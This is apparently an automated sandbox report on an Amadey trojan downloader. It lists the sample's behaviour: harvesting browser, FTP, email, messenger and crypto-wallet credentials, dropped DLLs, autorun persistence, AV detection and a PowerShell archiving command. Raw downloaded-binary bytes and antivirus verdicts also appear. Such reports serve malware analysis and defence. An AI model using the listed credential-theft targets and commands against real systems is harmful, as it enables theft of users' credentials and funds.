NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0002a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Steals private information from local Internet browsers (5 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file	C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\0560249ade67ec\cred64.dll
file	C:\Users\test22\AppData\Roaming\0560249ade67ec\clip64.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\0560249ade67ec\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 16, 2024, 11:06 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe	1	1
ShellExecuteExW Oct. 16, 2024, 11:06 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\0560249ade67ec\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Oct. 16, 2024, 11:06 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\0560249ade67ec\clip64.dll, Main filepath: rundll32.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (9 events)

Time & API	Arguments	Status	Return
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: pw.exe process_identifier: 1800	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: taskhost.exe process_identifier: 772	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: SearchProtocolHost.exe process_identifier: 1516	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: Gxtuum.exe process_identifier: 2204	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: mscorsvw.exe process_identifier: 2456	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: mscorsvw.exe process_identifier: 2500	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: sppsvc.exe process_identifier: 2548	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: rundll32.exe process_identifier: 2616	1	1
Process32NextW Oct. 16, 2024, 11:06 a.m.	snapshot_handle: 0x0000000000000128 process_name: rundll32.exe process_identifier: 2660	1	1

An executable file was downloaded by the process gxtuum.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Oct. 16, 2024, 11:06 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÆÞÉ ¿§^¿§^¿§^Ù×£_¿§^Ù×¤_¿§^Ù×¢_2¿§^WÒ¢_Ä¿§^WÒ£_¿§^WÒ¤_¿§^Ù×¦_¿§^¿¦^C¿§^Ñ®_¿§^Ñ§_¿§^ÑX^¿§^Ñ¥_¿§^Rich¿§^PEdùxgð" ¼TÈ P`@X ø`p0ôÐp@Ðè.text¨º¼ `.rdataÎÐÐÀ@@.data¬» D@À.pdatap`®Ô@@_RDATA@@.rsrcø @@.relocô0@BHì(A¸ H§nH à»è3H lHÄ(é/íÌÌÌHì(A¸ HnH ðÂèH ¬HÄ(éÿìÌÌÌHì(A¸HnH àÃèÓH ìHÄ(éÏìÌÌÌHì(A¸ HonH 0½è£H ,HÄ(éìÌÌÌHì(A¸HgnH ÂèsH lHÄ(éoìÌÌÌHì(A¸HOnH 0ºèCH ¬HÄ(é?ìÌÌÌHì(E3ÀHÂÏH ÃÂèH ïHÄ(éìÌÌÌÌÌÌHì(E3ÀHÏH 3ÃèæH /HÄ(éâëÌÌÌÌÌÌHì(E3ÀHbÏH c¼è¶H oHÄ(é²ëÌÌÌÌÌÌHì(E3ÀH2ÏH ó¸èH ¯HÄ(éëÌÌÌÌÌÌHì(A¸HmH À¹èSH ìHÄ(éOëÌÌÌHì(A¸H_mH ÐÅè#H ,HÄ(éëÌÌÌHì(A¸H?mH `ÁèóH lHÄ(éïêÌÌÌHì(A¸HmH p·èÃH ¬HÄ(é¿êÌÌÌHì(A¸$HÿlH ¹èH ìHÄ(éêÌÌÌHì(A¸H÷lH PÂècH ,HÄ(é_êÌÌÌHì(A¸HßlH `ºè3H lHÄ(é/êÌÌÌHì(A¸HÏlH p½èH ¬HÄ(éÿéÌÌÌHì(A¸H¯lH `½èÓH ìHÄ(éÏéÌÌÌHì(A¸HlH p¼è£H ,HÄ(ééÌÌÌHì(A¸HwlH ¿èsH lHÄ(éoéÌÌÌHì(A¸HWlH Ð¿èCH ¬HÄ(é?éÌÌÌHì(A¸LH?lH ºèH ìHÄ(ééÌÌÌHì(A¸H_lH 0¶èãH ,HÄ(éßèÌÌÌHì(A¸dHOlH Ãè³H lHÄ(é¯èÌÌÌHì(A¸HlH ð¿èH ¬HÄ(éèÌÌÌHì(A¸HolH ½èSH ìHÄ(éOèÌÌÌHì(A¸H_lH °µè#H ,HÄ(éèÌÌÌHì(A¸H?lH ¾èóH lHÄ(éïçÌÌÌHì(A¸(HlH ¼èÃH ¬HÄ(é¿çÌÌÌHì(A¸HlH `ÀèH ìHÄ(éçÌÌÌHì(A¸HÿkH ÃècH ,HÄ(é_çÌÌÌHì(A¸HßkH ½è3H lHÄ(é/çÌÌÌHì(A¸H¿kH 0ÀèH ¬HÄ(éÿæÌÌÌHì(A¸H¯kH ¹èÓH ìHÄ(éÏæÌÌÌHì(A¸,HkH Pºè£H ,HÄ(éæÌÌÌHì(A¸HkH à¸èsH lHÄ(éoæÌÌÌHì(A¸HkH ð½èCH ¬HÄ(é?æÌÌÌHì(A¸$H_kH `¿èH ìHÄ(éæÌÌÌHì(A¸HWkH PºèãH ,HÄ(éßåÌÌÌHì(A¸H?kH @²è³H lHÄ(é¯åÌÌÌHì(A¸HkH ðºèH ¬HÄ(éåÌÌÌHì(A¸HÿjH À¶èSH ìHÄ(éOåÌÌÌHì(A¸HçjH ¼è#H ,HÄ(éåÌÌÌHì(E3ÀH¢ÈH C¸èöH oHÄ(éòäÌÌÌÌÌÌHì(A¸HjH ð³èÃH ¬HÄ(é¿äÌÌÌHì(A¸HjH @·èH ìHÄ(éäÌÌÌHì(A¸HgjH ð²ècH ,HÄ(é_äÌÌÌHì(A¸HGjH à½è3H lHÄ(é/äÌÌÌHì(A¸LH/gH Ð·èH ¬HÄ(éÿãÌÌÌHì(A¸H×iH à·èÓH ìHÄ(éÏãÌÌÌHì(A¸dH?gH ð¸è£H ,HÄ(éãÌÌÌHì(A¸HiH à½èsH lHÄ(éoãÌÌÌHì(A¸HiH P¼èCH ¬HÄ(é?ãÌÌÌHì(A¸HgiH À·èH ìHÄ(éãÌÌÌHì(A¸HGiH °³èãH ,HÄ(éßâÌÌÌHì(A¸HiH ¾è³H lHÄ(é¯âÌÌÌHì(A¸H÷hH °¶èH ¬HÄ(éâÌÌÌHì(A¸HÏhH ´èSH ìHÄ(éOâÌÌÌHì(A¸H¯hH ð±è#H ,HÄ(éâÌÌÌHì(A¸HhH `®èóH lHÄ(éïáÌÌÌHì(A¸HhH ·èÃH ¬HÄ(é¿áÌÌÌHì(A¸0H_hH `¼èH ìHÄ(éáÌÌÌHì(A¸HghH P¼ècH ,HÄ(é_áÌÌÌ request_handle: 0x00cc000c	1	1	0
InternetReadFile Oct. 16, 2024, 11:06 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPELûxgà!R´rp@@ÜÝPø tPË8Ë@pL.textQR `.rdatatpvV@@.dataìðÌ@À.rsrcøà@@.reloct â@Bj h¾¹`øè/Oh8è\YÃÌÌÌj h¬¾¹xøèOh`8è}\YÃÌÌÌjhÐ¾¹øèïNhÀ8è]\YÃÌÌÌj hØ¾¹¨øèÏNh 9è=\YÃÌÌÌjhü¾¹Àøè¯Nh9è\YÃÌÌÌjh¿¹ØøèNhà9èý[YÃÌÌÌjh1¿¹ðøèoNh@:èÝ[YÃÌÌÌjh1¿¹ùèONh :è½[YÃÌÌÌjh1¿¹ ùè/Nh;è[YÃÌÌÌjh1¿¹8ùèNh`;è}[YÃÌÌÌjh4¿¹PùèïMhÀ;è][YÃÌÌÌjh@¿¹hùèÏMh <è=[YÃÌÌÌjhL¿¹ùè¯Mh<è[YÃÌÌÌjhX¿¹ùèMhà<èýZYÃÌÌÌj$hd¿¹°ùèoMh@=èÝZYÃÌÌÌjh¿¹ÈùèOMh =è½ZYÃÌÌÌjh ¿¹àùè/Mh>èZYÃÌÌÌjhÀ¿¹øùèMh`>è}ZYÃÌÌÌjhÐ¿¹úèïLhÀ>è]ZYÃÌÌÌjhÜ¿¹(úèÏLh ?è=ZYÃÌÌÌjhð¿¹@úè¯Lh?èZYÃÌÌÌjhü¿¹XúèLhà?èýYYÃÌÌÌjLhÀ¹púèoLh@@èÝYYÃÌÌÌjh`À¹úèOLh @è½YYÃÌÌÌjdhÀ¹ úè/LhAèYYÃÌÌÌjhèÀ¹¸úèLh`Aè}YYÃÌÌÌjhüÀ¹ÐúèïKhÀAè]YYÃÌÌÌjhÁ¹èúèÏKh Bè=YYÃÌÌÌjh(Á¹ûè¯KhBèYYÃÌÌÌj(h8Á¹ûèKhàBèýXYÃÌÌÌjhdÁ¹0ûèoKh@CèÝXYÃÌÌÌjhtÁ¹HûèOKh Cè½XYÃÌÌÌjhÁ¹`ûè/KhDèXYÃÌÌÌjhÁ¹xûèKh`Dè}XYÃÌÌÌjh¬Á¹ûèïJhÀDè]XYÃÌÌÌj,h¼Á¹¨ûèÏJh Eè=XYÃÌÌÌjhìÁ¹Àûè¯JhEèXYÃÌÌÌjhÂ¹ØûèJhàEèýWYÃÌÌÌj$hÂ¹ðûèoJh@FèÝWYÃÌÌÌjh@Â¹üèOJh Fè½WYÃÌÌÌjhTÂ¹ üè/JhGèWYÃÌÌÌjh`Â¹8üèJh`Gè}WYÃÌÌÌjhlÂ¹PüèïIhÀGè]WYÃÌÌÌjhÂ¹hüèÏIh Hè=WYÃÌÌÌjh1¿¹üè¯IhHèWYÃÌÌÌjhÂ¹üèIhàHèýVYÃÌÌÌjh¨Â¹°üèoIh@IèÝVYÃÌÌÌjhÀÂ¹ÈüèOIh Iè½VYÃÌÌÌjhÌÂ¹àüè/IhJèVYÃÌÌÌjLhÀ¹øüèIh`Jè}VYÃÌÌÌjhÀÂ¹ýèïHhÀJè]VYÃÌÌÌjdhÀ¹(ýèÏHh Kè=VYÃÌÌÌjhÜÂ¹@ýè¯HhKèVYÃÌÌÌjhðÂ¹XýèHhàKèýUYÃÌÌÌjhÃ¹pýèoHh@LèÝUYÃÌÌÌjhÃ¹ýèOHh Lè½UYÃÌÌÌjhÃ¹ ýè/HhMèUYÃÌÌÌjh$Ã¹¸ýèHh`Mè}UYÃÌÌÌjh,Ã¹ÐýèïGhÀMè]UYÃÌÌÌjh8Ã¹èýèÏGh Nè=UYÃÌÌÌjhDÃ¹þè¯GhNèUYÃÌÌÌjhdÃ¹þèGhàNèýTYÃÌÌÌj0htÃ¹0þèoGh@OèÝTYÃÌÌÌjh¨Ã¹HþèOGh Oè½TYÃÌÌÌjh¸Ã¹`þè/GhPèTYÃÌÌÌjhÄÃ¹xþèGh`Pè}TYÃÌÌÌj<hÐÃ¹þèïFhÀPè]TYÃÌÌÌj0hÄ¹¨þèÏFh Qè=TYÃÌÌÌjhDÄ¹Àþè¯FhQèTYÃÌÌÌj4hPÄ¹ØþèFhàQèýSYÃÌÌÌj8hÄ¹ðþèoFh@RèÝSYÃÌÌÌjhÄÄ¹ÿèOFh Rè½SYÃÌÌÌj<hÐÄ¹ ÿè/FhSèSYÃÌÌÌj4hÅ¹8ÿèFh`Sè}SYÃÌÌÌjhHÅ¹PÿèïEhÀSè]SYÃÌÌÌj@hXÅ¹hÿèÏEh Tè=SYÃÌÌÌj8hÅ¹ÿè¯EhTèSYÃÌÌÌjhØÅ¹ÿèEhàTèýRYÃÌÌÌj4hèÅ¹°ÿèoEh@UèÝRYÃÌÌÌj,h Æ¹ÈÿèOEh Uè½RYÃÌÌÌjhPÆ¹àÿè/EhVèRYÃÌÌÌj4h`Æ¹øÿèEh`Vè}RYÃÌÌÌj(hÆ¹èïDhÀVè]RYÃÌÌÌjhÄÆ¹(èÏDh Wè=RYÃÌÌÌj4hÔÆ¹@è¯DhWèRYÃÌÌÌj(hÇ¹XèDhàWèýQYÃÌÌÌjh8Ç¹pèoDh@XèÝQYÃÌÌÌj<hDÇ¹èODh Xè½QYÃÌÌÌj0hÇ¹ è/DhYèQYÃÌÌÌjh¸Ç¹¸èDh`Yè}QYÃÌÌÌj<hÄÇ¹ÐèïChÀYè]QYÃÌÌÌj4hÈ¹èèÏCh Zè=QYÃÌÌÌjh<È¹è¯ChZèQYÃÌÌÌj0hHÈ¹èChàZèýPYÃÌÌÌj(h\|È¹0èoCh@[èÝPYÃÌÌÌjh¨È¹HèOCh [è½PYÃÌÌÌ request_handle: 0x00cc000c	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 16, 2024, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

netsh wlan show profiles

Communicates with host for which no DNS query was performed (1 event)

host

78.153.139.168

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (1 event)

file	C:\Windows\Tasks\Gxtuum.job

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets
file	C:\Users\test22\AppData\Roaming\Litecoin\wallets

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Harvests information related to installed instant messenger clients (15 events)

file	C:\Users\test22\AppData\Local\Temp\76c5995d57\.purple\accounts.xml
file	C:\Windows\.purple\accounts.xml
file	C:\Python27\.purple\accounts.xml
file	C:\Windows\System32\.purple\accounts.xml
file	C:\.purple\accounts.xml
file	C:\SystemRoot\System32\.purple\accounts.xml
file	C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
file	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.purple\accounts.xml
file	C:\Program Files (x86)\Microsoft Office\Office15\.purple\accounts.xml
file	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\.purple\accounts.xml
file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file	C:\Windows\SysWOW64\.purple\accounts.xml
file	C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file	C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\.purple\accounts.xml

Harvests credentials from local email clients (2 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server

File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Amadey.a!c
Cynet	Malicious (score: 100)
CAT-QuickHeal	Trojandownloader.Deyma
Skyhigh	BehavesLike.Win32.Generic.hh
ALYac	Gen:Variant.Zusy.535541
Cylance	Unsafe
VIPRE	Gen:Variant.Zusy.535541
Sangfor	Downloader.Win32.Amadey.Vuku
CrowdStrike	win/malicious_confidence_70% (D)
BitDefender	Gen:Variant.Zusy.535541
K7GW	Trojan-Downloader ( 005790d31 )
K7AntiVirus	Trojan-Downloader ( 005790d31 )
Arcabit	Trojan.Zusy.D82BF5
Baidu	Win32.Trojan.Delf.in
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.A
APEX	Malicious
Avast	Win32:MalwareX-gen [Trj]
ClamAV	Win.Malware.Generic-10033391-0
Kaspersky	UDS:DangerousObject.Multi.Generic
Alibaba	TrojanDownloader:Win32/Amadey.dcc40490
NANO-Antivirus	Trojan.Win32.Redcap.ksraod
MicroWorld-eScan	Gen:Variant.Zusy.535541
Rising	Downloader.Amadey!8.125AC (CLOUD)
Emsisoft	Gen:Variant.Zusy.535541 (B)
F-Secure	Trojan.TR/Redcap.wksod
DrWeb	Trojan.MulDrop28.29236
McAfeeD	Real Protect-LS!689FF816FC3D
Trapmine	malicious.high.ml.score
CTX	exe.trojan.amadey
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
FireEye	Generic.mg.689ff816fc3db388
Webroot	W32.Malware.Gen
Google	Detected
Avira	TR/Redcap.wksod
Antiy-AVL	Trojan[Downloader]/Win32.Deyma
Kingsoft	malware.kb.a.948
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	Trojan:Win32/Amadey.BKC!MTB
ZoneAlarm	HEUR:Trojan-Downloader.Win32.Deyma.gen
GData	Gen:Variant.Zusy.535541
AhnLab-V3	Trojan/Win.Generic.R671687
VBA32	BScope.TrojanDownloader.Deyma
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.1487355604
Ikarus	Trojan-Downloader.Win32.Amadey
Panda	Trj/GdSda.A

madey.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All